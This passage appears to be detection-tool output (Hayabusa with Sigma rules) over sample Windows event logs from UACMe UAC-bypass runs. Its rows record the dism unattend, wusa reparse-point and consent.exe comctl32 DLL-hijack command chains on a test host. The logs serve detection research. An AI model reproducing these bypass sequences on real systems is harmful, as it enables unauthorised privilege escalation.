Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 
747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: 
C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: 
SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,info,,Process 
Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.524 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 
747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:25.165 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.096 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 
6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:31:27.683 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:34.875 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe 
